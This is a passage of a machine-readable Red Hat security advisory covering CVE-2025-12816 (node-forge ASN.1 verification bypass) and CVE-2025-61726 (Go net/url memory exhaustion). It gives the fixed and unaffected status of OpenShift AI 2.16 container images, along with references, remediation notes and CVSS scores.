"text": "A flaw was found in node-forge. This vulnerability allows unauthenticated attackers to bypass downstream cryptographic verifications and security decisions via crafting ASN.1 (Abstract Syntax Notation One) structures to desynchronize schema validations, yielding a semantic divergence.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-forge: node-forge: Interpretation conflict vulnerability allows bypassing cryptographic verifications",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products due to an interpretation conflict in the node-forge library. An unauthenticated attacker could exploit this flaw by crafting malicious ASN.1 structures, leading to a bypass of cryptographic verifications and security decisions in affected applications. This impacts various Red Hat products that utilize node-forge for cryptographic operations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12816"
},
{
"category": "external",
"summary": "RHBZ#2417097",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417097"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12816"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12816",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12816"
},
{
"category": "external",
"summary": "https://github.com/digitalbazaar/forge",
"url": "https://github.com/digitalbazaar/forge"
},
{
"category": "external",
"summary": "https://github.com/digitalbazaar/forge/pull/1124",
"url": "https://github.com/digitalbazaar/forge/pull/1124"
},
{
"category": "external",
"summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5gfm-wpxj-wjgq",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5gfm-wpxj-wjgq"
},
{
"category": "external",
"summary": "https://kb.cert.org/vuls/id/521113",
"url": "https://kb.cert.org/vuls/id/521113"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/node-forge",
"url": "https://www.npmjs.com/package/node-forge"
}
],
"release_date": "2025-11-25T19:15:50.243000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "node-forge: node-forge: Interpretation conflict vulnerability allows bypassing cryptographic verifications"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
